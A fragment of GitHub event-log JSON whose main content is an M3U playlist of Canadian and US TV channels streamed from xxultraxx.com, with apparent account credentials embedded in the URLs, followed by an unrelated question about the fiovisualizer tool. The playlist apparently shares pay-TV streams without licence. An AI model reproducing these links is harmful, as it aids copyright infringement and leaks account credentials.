CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9838.ts\r\n#EXTINF:-1,CAN: FX USA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9842.ts\r\n#EXTINF:-1,CAN: FYI\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9966.ts\r\n#EXTINF:-1,CAN: Ginx Esports\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9826.ts\r\n#EXTINF:-1,CAN: GLOBAL TORONTO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9965.ts\r\n#EXTINF:-1,CAN: GLOBAL VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9866.ts\r\n#EXTINF:-1,CAN: GOLF\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9921.ts\r\n#EXTINF:-1,CAN: GOLF HD\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9809.ts\r\n#EXTINF:-1,CAN: GSN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9964.ts\r\n#EXTINF:-1,CAN: GUSTO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9872.ts\r\n#EXTINF:-1,CAN: H2 CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9863.ts\r\n#EXTINF:-1,CAN: HGTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9963.ts\r\n#EXTINF:-1,CAN: HISTORIO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9815.ts\r\n#EXTINF:-1,CAN: HISTORY\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9962.ts\r\n#EXTINF:-1,CAN: HLN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9871.ts\r\n#EXTINF:-1,CAN: ICI MONTREAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9813.ts\r\n#EXTINF:-1,CAN: ICI VANCOUVER\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9812.ts\r\n#EXTINF:-1,CAN: ID CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9912.ts\r\n#EXTINF:-1,CAN: IFC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9911.ts\r\n#EXTINF:-1,CAN: KNOWLEDGE KIDS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9908.ts\r\n#EXTINF:-1,CAN: KTLA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9862.ts\r\n#EXTINF:-1,CAN: LCN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9907.ts\r\n#EXTINF:-1,CAN: LEAFS TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9816.ts\r\n#EXTINF:-1,CAN: LIFETIME\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9861.ts\r\n#EXTINF:-1,CAN: LOVE NATURE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9837.ts\r\n#EXTINF:-1,CAN: MAVTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9906.ts\r\n#EXTINF:-1,CAN: MAX\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9825.ts\r\n#EXTINF:-1,CAN: METEO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9824.ts\r\n#EXTINF:-1,CAN: MIRACLE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9905.ts\r\n#EXTINF:-1,CAN: MOI CIE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9960.ts\r\n#EXTINF:-1,CAN: MSNBC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9841.ts\r\n#EXTINF:-1,CAN: MTIME\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9959.ts\r\n#EXTINF:-1,CAN: MTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9958.ts\r\n#EXTINF:-1,CAN: MUCH MUSIC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9870.ts\r\n#EXTINF:-1,CAN: MUSIQUE PLUS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9957.ts\r\n#EXTINF:-1,CAN: NAT GEO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9865.ts\r\n#EXTINF:-1,CAN: NBA TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9904.ts\r\n#EXTINF:-1,CAN: NBC WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9956.ts\r\n#EXTINF:-1,CAN: NICK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9955.ts\r\n#EXTINF:-1,CAN: NTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9903.ts\r\n#EXTINF:-1,CAN: OLN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9954.ts\r\n#EXTINF:-1,CAN: OMNI 1\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9953.ts\r\n#EXTINF:-1,CAN: OMNI 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9834.ts\r\n#EXTINF:-1,CAN: ONE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9823.ts\r\n#EXTINF:-1,CAN: OUTTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9952.ts\r\n#EXTINF:-1,CAN: OWN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9951.ts\r\n#EXTINF:-1,CAN: PRISE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9860.ts\r\n#EXTINF:-1,CAN: RDI\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9950.ts\r\n#EXTINF:-1,CAN: RDS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9859.ts\r\n#EXTINF:-1,CAN: RDS 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9822.ts\r\n#EXTINF:-1,CAN: SERIS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9858.ts\r\n#EXTINF:-1,CAN: SHOPPING\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9945.ts\r\n#EXTINF:-1,CAN: SHOWCASE EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9821.ts\r\n#EXTINF:-1,CAN: SILVER SCREEN CLASSICS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9902.ts\r\n#EXTINF:-1,CAN: SLICE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9857.ts\r\n#EXTINF:-1,CAN: SMITHSONIAN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9810.ts\r\n#EXTINF:-1,CAN: SPACE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9944.ts\r\n#EXTINF:-1,CAN: SPIKE TV / PARAMOUNT CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9817.ts\r\n#EXTINF:-1,CAN: SPIKE TV USA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9846.ts\r\n#EXTINF:-1,CAN: SPORTSNET 360\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9915.ts\r\n#EXTINF:-1,CAN: SPORTSNET EAST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9864.ts\r\n#EXTINF:-1,CAN: SPORTSNET ONE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9914.ts\r\n#EXTINF:-1,CAN: SPORTSNET ONTARIO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9913.ts\r\n#EXTINF:-1,CAN: SPORTSNET PACIFIC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9943.ts\r\n#EXTINF:-1,CAN: SPORTSNET WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9901.ts\r\n#EXTINF:-1,CAN: SPORTSNET WORLD\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9942.ts\r\n#EXTINF:-1,CAN: SUNDANCE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9856.ts\r\n#EXTINF:-1,CAN: SUPER CHANNEL 1\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9941.ts\r\n#EXTINF:-1,CAN: SUPER CHANNEL 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9940.ts\r\n#EXTINF:-1,CAN: SUPER CHANNEL VAULT\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9900.ts\r\n#EXTINF:-1,CAN: SUPER ECRAN 1\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9949.ts\r\n#EXTINF:-1,CAN: SUPER ECRAN 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9948.ts\r\n#EXTINF:-1,CAN: SUPER ECRAN 3\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9947.ts\r\n#EXTINF:-1,CAN: SUPER ECRAN 4\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9946.ts\r\n#EXTINF:-1,CAN: TCM\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9939.ts\r\n#EXTINF:-1,CAN: TELE LATINO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9855.ts\r\n#EXTINF:-1,CAN: TELE QUEBEC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9899.ts\r\n#EXTINF:-1,CAN: TELE TOON FRENCH\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9898.ts\r\n#EXTINF:-1,CAN: TELEMAGINO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9961.ts\r\n#EXTINF:-1,CAN: THE WEATHER NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9820.ts\r\n#EXTINF:-1,CAN: TMN 1\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9854.ts\r\n#EXTINF:-1,CAN: TMN 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9853.ts\r\n#EXTINF:-1,CAN: TMN 3\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9839.ts\r\n#EXTINF:-1,CAN: TMN 4\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9852.ts\r\n#EXTINF:-1,CAN: TSN 1\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9920.ts\r\n#EXTINF:-1,CAN: TSN 2\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9919.ts\r\n#EXTINF:-1,CAN: TSN 3\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9918.ts\r\n#EXTINF:-1,CAN: TSN 4\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9917.ts\r\n#EXTINF:-1,CAN: TSN 5\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9916.ts\r\n#EXTINF:-1,CAN: TV5 QUEBEC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9819.ts\r\n#EXTINF:-1,CAN: TVA GATINEAU\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9851.ts\r\n#EXTINF:-1,CAN: TVA MONTREAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9897.ts\r\n#EXTINF:-1,CAN: TVA QUEBEC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9938.ts\r\n#EXTINF:-1,CAN: TVA SPORTS\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9937.ts\r\n#EXTINF:-1,CAN: TVO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9818.ts\r\n#EXTINF:-1,CAN: UNIVISION CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9811.ts\r\n#EXTINF:-1,CAN: V MONTREAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9896.ts\r\n#EXTINF:-1,CAN: VICELAND\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9850.ts\r\n#EXTINF:-1,CAN: VIE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9895.ts\r\n#EXTINF:-1,CAN: VISION\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9936.ts\r\n#EXTINF:-1,CAN: VRAK TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9935.ts\r\n#EXTINF:-1,CAN: W NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9894.ts\r\n#EXTINF:-1,CAN: WFN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9893.ts\r\n#EXTINF:-1,CAN: WGN\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9892.ts\r\n#EXTINF:-1,CAN: Wild TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9891.ts\r\n#EXTINF:-1,CAN: YOOPA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9849.ts\r\n#EXTINF:-1,CAN: YTV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9890.ts\r\n#EXTINF:-1,CAN: Z TELE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9934.ts\r\n#EXTINF:-1,CAN: ZEE TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9933.ts\r\n#EXTINF:-1,CAN: ZESTE\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/9848.ts\r\n#EXTINF:-1,CAN: CITY MONTREAL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10270.ts\r\n#EXTINF:-1,CAN: COMEDY WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10271.ts\r\n#EXTINF:-1,CAN: CTV HALIFAX\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10266.ts\r\n#EXTINF:-1,CAN: GLOBAL HALIFAX\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10265.ts\r\n#EXTINF:-1,CAN: HOPE TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10264.ts\r\n#EXTINF:-1,CAN: JOY TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10263.ts\r\n#EXTINF:-1,CAN: MAKEFUL\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10269.ts\r\n#EXTINF:-1,CAN: MLB NETWORK\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10267.ts\r\n#EXTINF:-1,CAN: RDS INFO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10272.ts\r\n#EXTINF:-1,CAN: TELE TOON WEST\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10274.ts\r\n#EXTINF:-1,CAN: TFO\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10273.ts\r\n#EXTINF:-1,CAN: TLC CANADA\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10268.ts\r\n#EXTINF:-1,CAN: UNIS TV\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10261.ts\r\n#EXTINF:-1,CAN: V QUEBEC\r\nhttp://xxultraxx.com:8000/live/abc12345/abc12345/10262.ts\r\n\r\n#EXTINF:-1,CA: HBO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7635.ts\r\n#EXTINF:-1,CA: HBO COMEDY HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9349.ts\r\n#EXTINF:-1,CA: HBO FAMILY HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9351.ts\r\n#EXTINF:-1,CA: HBO SIGNATURE HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9350.ts\r\n#EXTINF:-1,CA: HBO ZONE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7633.ts\r\n#EXTINF:-1,CA: HGTV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7649.ts\r\n#EXTINF:-1,CA: HSN\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7618.ts\r\n#EXTINF:-1,CA: ID\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7662.ts\r\n#EXTINF:-1,CA: LIFETIME HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9363.ts\r\n#EXTINF:-1,CA: National_Geographie\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7623.ts\r\n#EXTINF:-1,CA: NBC_Golf\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7629.ts\r\n#EXTINF:-1,CA: NFL_Network\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7643.ts\r\n#EXTINF:-1,CA: SPIKE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7647.ts\r\n#EXTINF:-1,CA: TBS\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7658.ts\r\n#EXTINF:-1,CA: TNT\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7660.ts\r\n#EXTINF:-1,CA: CNN\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9338.ts\r\n#EXTINF:-1,CA: UNIVISION HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9342.ts\r\n#EXTINF:-1,CA: CINEMAX HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9992.ts\r\n#EXTINF:-1,CA: FX HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9991.ts\r\n#EXTINF:-1,CA: FXM HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9989.ts\r\n#EXTINF:-1,CA: FXX HD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9990.ts\r\n#EXTINF:-1,CA: WWE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/7651.ts\r\n#EXTINF:-1,CAN: CP24\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9347.ts\r\n#EXTINF:-1,CAN: CRIME INVESTIGATION\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9346.ts\r\n#EXTINF:-1,CAN: DISCOVERY CHANNEL\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9344.ts\r\n#EXTINF:-1,CAN: DISCOVERY SCIENCE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9343.ts\r\n#EXTINF:-1,CAN: FAMILY WEST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9341.ts\r\n#EXTINF:-1,CAN: FIGHT NETWORK\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9340.ts\r\n#EXTINF:-1,CAN: BRAVO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9348.ts\r\n#EXTINF:-1,CAN: FOX-W\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9339.ts\r\n#EXTINF:-1,CAN: GAME TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9337.ts\r\n#EXTINF:-1,CAN: Hallmark\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9361.ts\r\n#EXTINF:-1,CAN: HBO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9336.ts\r\n#EXTINF:-1,CAN: HBO 2\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9335.ts\r\n#EXTINF:-1,CAN: NBC EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9324.ts\r\n#EXTINF:-1,CAN: PBS-W\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9334.ts\r\n#EXTINF:-1,CAN: SHOWTIME\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9332.ts\r\n#EXTINF:-1,CAN: TELETOON EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9330.ts\r\n#EXTINF:-1,CAN: TLC\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9331.ts\r\n#EXTINF:-1,CAN: TRAVEL AND ESCAPE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9329.ts\r\n#EXTINF:-1,CAN: WSBK\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9327.ts\r\n#EXTINF:-1,CAN: CTV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9345.ts\r\n#EXTINF:-1,CAN: PEACH TREE TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9333.ts\r\n#EXTINF:-1,CAN: TREEHOUSE TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9328.ts\r\n#EXTINF:-1,CAN: YES\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9326.ts\r\n#EXTINF:-1,CAN: YTV-E\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9325.ts\r\n#EXTINF:-1,CAN: ABC EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9932.ts\r\n#EXTINF:-1,CAN: ABC SPARK CANADA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9844.ts\r\n#EXTINF:-1,CAN: ABC WEST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9988.ts\r\n#EXTINF:-1,CAN: ACTION\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9889.ts\r\n#EXTINF:-1,CAN: ADDIK TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9888.ts\r\n#EXTINF:-1,CAN: AHC\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9832.ts\r\n#EXTINF:-1,CAN: AMC\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9987.ts\r\n#EXTINF:-1,CAN: ANIMAL PLANET\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9986.ts\r\n#EXTINF:-1,CAN: APTN\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9887.ts\r\n#EXTINF:-1,CAN: ARTV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9886.ts\r\n#EXTINF:-1,CAN: BBC CANADA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9885.ts\r\n#EXTINF:-1,CAN: BBC KIDS\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9884.ts\r\n#EXTINF:-1,CAN: BBC WORLD NEWS\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9931.ts\r\n#EXTINF:-1,CAN: BET\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9930.ts\r\n#EXTINF:-1,CAN: BNN\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9883.ts\r\n#EXTINF:-1,CAN: BOOK TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9929.ts\r\n#EXTINF:-1,CAN: CANAL D\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9910.ts\r\n#EXTINF:-1,CAN: CANAL SAVOIR\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9985.ts\r\n#EXTINF:-1,CAN: CARTOON NETWORK\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9928.ts\r\n#EXTINF:-1,CAN: CASA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9984.ts\r\n#EXTINF:-1,CAN: CBC MONTREAL\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9831.ts\r\n#EXTINF:-1,CAN: CBC NEWS\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9927.ts\r\n#EXTINF:-1,CAN: CBC OTTAWA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9882.ts\r\n#EXTINF:-1,CAN: CBC TORONTO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9983.ts\r\n#EXTINF:-1,CAN: CBC VANCOUVER\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9881.ts\r\n#EXTINF:-1,CAN: CBS EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9880.ts\r\n#EXTINF:-1,CAN: CBS WEST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9879.ts\r\n#EXTINF:-1,CAN: CHCH\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9982.ts\r\n#EXTINF:-1,CAN: CINEPOP\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9878.ts\r\n#EXTINF:-1,CAN: CITY TORONTO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9877.ts\r\n#EXTINF:-1,CAN: CITY VANCOUVER\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9909.ts\r\n#EXTINF:-1,CAN: CMT CANADA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9926.ts\r\n#EXTINF:-1,CAN: CNBC\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9876.ts\r\n#EXTINF:-1,CAN: CNN\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9981.ts\r\n#EXTINF:-1,CAN: CNN INTERNATIONAL\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9875.ts\r\n#EXTINF:-1,CAN: COMEDY EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9830.ts\r\n#EXTINF:-1,CAN: COMEDY GOLD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9980.ts\r\n#EXTINF:-1,CAN: COOKING CHANNEL\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9979.ts\r\n#EXTINF:-1,CAN: COSMO\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9925.ts\r\n#EXTINF:-1,CAN: COTTAGE LIFE\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9924.ts\r\n#EXTINF:-1,CAN: CPAC\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9978.ts\r\n#EXTINF:-1,CAN: CPAC FRENCH\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9977.ts\r\n#EXTINF:-1,CAN: CTV 2 VANCOUVER\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9976.ts\r\n#EXTINF:-1,CAN: CTV NEWS NETWORK\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9975.ts\r\n#EXTINF:-1,CAN: CTV OTTAWA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9974.ts\r\n#EXTINF:-1,CAN: CTV VANCOUVER\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9814.ts\r\n#EXTINF:-1,CAN: CTV2 OTTAWA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9829.ts\r\n#EXTINF:-1,CAN: CW 11\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9973.ts\r\n#EXTINF:-1,CAN: DAYSTAR TV\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9972.ts\r\n#EXTINF:-1,CAN: DEJAVIEW\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9923.ts\r\n#EXTINF:-1,CAN: DISCOVERY SCIENCE USA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9847.ts\r\n#EXTINF:-1,CAN: DISCOVERY VELOCITY\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9845.ts\r\n#EXTINF:-1,CAN: DISNEY\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9843.ts\r\n#EXTINF:-1,CAN: DISNEY CANADA\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9828.ts\r\n#EXTINF:-1,CAN: DISNEY FRENCH\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9971.ts\r\n#EXTINF:-1,CAN: DISNEY JR\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9836.ts\r\n#EXTINF:-1,CAN: DIY\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9874.ts\r\n#EXTINF:-1,CAN: DOCUMENTARY\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9922.ts\r\n#EXTINF:-1,CAN: DTOUR\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9970.ts\r\n#EXTINF:-1,CAN: E!ntertenment\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9827.ts\r\n#EXTINF:-1,CAN: ENCORE 1 EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9969.ts\r\n#EXTINF:-1,CAN: ENCORE 2 EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9869.ts\r\n#EXTINF:-1,CAN: FAMILY CHRGD\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9873.ts\r\n#EXTINF:-1,CAN: FAMILY EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9835.ts\r\n#EXTINF:-1,CAN: FOOD NETWORK\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9968.ts\r\n#EXTINF:-1,CAN: FOX EAST\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9868.ts\r\n#EXTINF:-1,CAN: FOX NEWS\r\nhttp://xxultraxx.com:80/live/sumsum/sumsum/9967.ts"}},"created_at":"2018-07-04T08:20:38Z"}
{"id":"7916964570","type":"CommitCommentEvent","actor":{"login":"Seanistolen"},"repo":{"name":"Seanistolen/fiovisualizer"},"payload":{"comment":{"id":29591428,"position":null,"line":null,"path":null,"commit_id":"fe527f370074320fc5d6eecd6cfbf3fbaf17400a","created_at":"2018-07-04T08:20:48Z","updated_at":"2018-07-04T08:20:48Z","author_association":"OWNER","body":"may i ask if there is only script for QoS test or not ? because i can't find a way to make a result plot(latency percentile) by this awesome fiovisualizer. "}},"created_at":"2018-07-04T08:20:48Z"}
